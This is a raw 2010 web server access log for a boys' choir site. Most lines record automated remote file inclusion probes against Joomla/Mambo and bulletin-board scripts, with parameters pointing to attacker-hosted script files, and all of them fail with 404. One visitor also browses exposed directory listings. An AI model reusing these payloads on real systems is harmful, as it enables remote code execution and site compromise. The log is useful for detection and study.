61.63.82.14 - - [09/Mar/2010:09:58:55 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.63.82.14 - - [09/Mar/2010:09:59:00 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.keunbid.com//technote7/skin_shop/standard/2_view_body/1d1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:59:06 -0800] "GET /logs/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:59:06 -0800] "GET /logs/access_100213.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:59:06 -0800] "GET /index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:10:00:26 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:10:00:26 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:10:00:26 -0800] "GET /logs/access_100210.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:10:00:31 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.sinaelee.com/lib/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:10:00:41 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:10:00:41 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:10:00:41 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:10:00:55 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:10:01:18 -0800] "GET /index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:10:01:18 -0800] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:10:01:55 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:10:01:55 -0800] "GET /logs/access_100205.log%20%20///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:10:01:55 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
219.240.39.222 - - [09/Mar/2010:10:02:19 -0800] "GET /logs/access_100131.log%20%20///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:10:02:35 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.milsasia.com////data/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:10:03:46 -0800] "GET /logs/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:10:03:46 -0800] "GET /logs/access_100213.log/write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:10:03:47 -0800] "GET /write.php?dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
200.93.147.154 - - [09/Mar/2010:10:04:02 -0800] "GET /logs/access_100117.log%20%20/index.php?redir=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:10:04:14 -0800] "GET /logs/access_100209.log%20%20////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:10:04:14 -0800] "GET ///bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:10:04:14 -0800] "GET /logs////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
66.102.237.18 - - [09/Mar/2010:10:04:29 -0800] "GET /logs/access_100131.log%20%20////bbs/write_update.php?board_skin_path=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:35 -0800] "GET /xxx/ HTTP/1.1" 200 662 "http://www.google.co.ve/search?hl=es&rlz=1C1GGLS_enVE341VE341&q=index+of+%2Bparent+%2Bxxx&btnG=Buscar&meta=&aq=f&oq=" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:36 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:39 -0800] "GET /xxx/resourcesgreg/ HTTP/1.1" 200 552 "http://www.americanboyschoir.com/xxx/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:40 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:42 -0800] "GET /xxx/ HTTP/1.1" 200 662 "http://www.americanboyschoir.com/xxx/resourcesgreg/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:42 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:43 -0800] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxx/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:43 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:46 -0800] "GET /xxxx/ HTTP/1.1" 200 522 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:10:05:46 -0800] "GET /logs//include.php?path[docroot]=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:10:05:46 -0800] "GET /include.php?path[docroot]=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:46 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:47 -0800] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxxx/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:48 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:48 -0800] "GET /logs/ HTTP/1.1" 200 1081 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:49 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:50 -0800] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:51 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:52 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:52 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:53 -0800] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/tmp/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:53 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:56 -0800] "GET /xxxxxxxxxx/ HTTP/1.1" 200 534 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:56 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:57 -0800] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxxxxxxxxx/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:57 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:05:59 -0800] "GET /xxxxxxxxx/ HTTP/1.1" 200 532 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:00 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:00 -0800] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxxxxxxxx/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:00 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:01 -0800] "GET /xxxxxxxx/ HTTP/1.1" 200 666 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:01 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:02 -0800] "GET / HTTP/1.1" 200 1724 "http://www.americanboyschoir.com/xxxxxxxx/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:02 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:03 -0800] "GET /xxxxxxxx/ HTTP/1.1" 200 666 "http://www.americanboyschoir.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:04 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:05 -0800] "GET /xxxxxxxx/access.log HTTP/1.1" 200 5797 "http://www.americanboyschoir.com/xxxxxxxx/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
190.207.235.199 - - [09/Mar/2010:10:06:05 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.5 (KHTML, like Gecko) Chrome/4.0.249.89 Safari/532.5" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:10:11:34 -0800] "GET /logs/access_100117.log/////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:10:11:34 -0800] "GET ////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.175.197.86 - - [09/Mar/2010:10:11:34 -0800] "GET /logs/////delete_comment.php?board_skin_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:10:13:40 -0800] "GET /setup.php?view[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:10:13:40 -0800] "GET /logs/access_100213.log/setup.php?view[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.136.23.172 - - [09/Mar/2010:10:13:40 -0800] "GET /logs/setup.php?view[use_category]=1&dir=http://www.noin9191.com/ams/ammember/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:13:40 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:13:40 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:13:59 -0800] "GET /logs/access_091213.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:14:00 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:15:45 -0800] "GET /logs/access_091213.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:10:15:46 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:10:16:01 -0800] "GET /index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:10:16:01 -0800] "GET /logs/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:10:16:01 -0800] "GET /logs/access_100212.log/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.119.216.146 - - [09/Mar/2010:10:16:11 -0800] "GET /logs/access_100116.log/index2.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:16:56 -0800] "GET /components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:16:56 -0800] "GET /logs/access_091213.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:16:56 -0800] "GET /logs/access_100112.log%20%20//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:16:56 -0800] "GET /logs//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:10:17:22 -0800] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
193.111.95.42 - - [09/Mar/2010:10:17:22 -0800] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://eventus.org.ru/mambots/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:41 -0800] "GET /logs/access_100202.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:41 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:45 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:17:47 -0800] "GET /logs/access_091213.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.239.219.10 - - [09/Mar/2010:10:17:48 -0800] "GET /logs/access_100112.log//components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:48 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:48 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:48 -0800] "GET /logs/access_100202.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:48 -0800] "GET /logs/access_100202.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:48 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:48 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:55 -0800] "GET /logs/access_100202.log%20%20/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:55 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
67.227.136.138 - - [09/Mar/2010:10:17:55 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
